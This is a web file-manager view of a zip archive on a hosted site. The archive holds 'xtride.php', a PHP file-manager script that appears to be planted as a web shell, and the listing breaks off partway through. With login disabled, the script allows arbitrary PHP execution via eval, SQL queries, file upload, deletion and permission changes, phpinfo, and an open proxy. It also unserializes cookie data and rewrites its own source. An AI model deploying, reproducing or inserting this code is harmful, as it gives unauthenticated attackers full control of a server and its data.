Файловый менеджер - Редактировать - /home/gqdcvggs/go.imators.com/account.imators.com.zip
Назад
PK @)�[�I�]: ]: xtride.phpnu �[��� <?php /* PHP File manager ver 1.6 */ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":""}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search": "Рекурсивный поиск","Mask":"Маска"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.6; ini_set('display_errors', '1'); ini_set('display_startup_errors', '1'); error_reporting(E_ALL); //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/henriyzx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU05Q